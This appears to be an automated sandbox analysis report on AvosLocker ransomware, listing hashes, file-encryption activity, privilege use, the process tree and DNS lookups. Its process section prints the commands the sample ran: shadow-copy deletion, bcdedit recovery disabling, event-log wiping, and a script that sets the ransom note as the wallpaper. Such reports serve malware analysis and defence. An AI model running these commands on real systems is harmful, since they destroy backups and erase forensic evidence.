N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/2900-1115-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

memory/2900-1277-0x0000000001E10000-0x0000000001E18000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0c650ec4ce86e3c53a9c48691d14eeb4
SHA1 87f69172e420e7e19fb9e0bdf9751d37b19cbfa3
SHA256 5c28ecf103e05989a86cead08344b4ac1bf8a9fb5a781e78330779c15b5ff8d4
SHA512 06ea99da239576afd07830534ab57a80d8e13a33b2e0f09c126a2ce7f90136568860e3b2c5ed25ca90cb00d827dc5338e362c22d48d8618ed8d45ae69582f881

memory/3912-24587-0x000000001B540000-0x000000001B822000-memory.dmp

memory/3912-24588-0x0000000001E80000-0x0000000001E88000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 16:28

Reported

2024-09-09 16:31

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (8501) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\240249736.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre-1.8\lib\jfr\profile.jfc | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Windows Defender\it-IT\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\de-DE\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\Office.Runtime.js | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Grace-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre-1.8\lib\resources.jar | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ur.pak | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_200_percent.pak | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxLargeTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses.svg | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File created | C:\Program Files\Mozilla Firefox\browser\VisualElements\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.ELM | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-256_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsSplashLogo.scale-180.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyView.scale-150.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\DatabaseCompare_f_col.hxk C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Common Files\microsoft shared\Triedit\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 1356 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3476 wrote to memory of 34716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3476 wrote to memory of 34716 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 216 wrote to memory of 34728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 216 wrote to memory of 34728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4372 wrote to memory of 34740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4372 wrote to memory of 34740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 184 wrote to memory of 18588 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 184 wrote to memory of 18588 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2952 wrote to memory of 15604 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2952 wrote to memory of 15604 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 23168 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 23168 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 23168 wrote to memory of 22688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 23168 wrote to memory of 22688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 23168 wrote to memory of 22224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 23168 wrote to memory of 22224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\240249736.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 44.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/15604-17708-0x0000017DFABF0000-0x0000017DFAC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51kx1lm4.ws3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
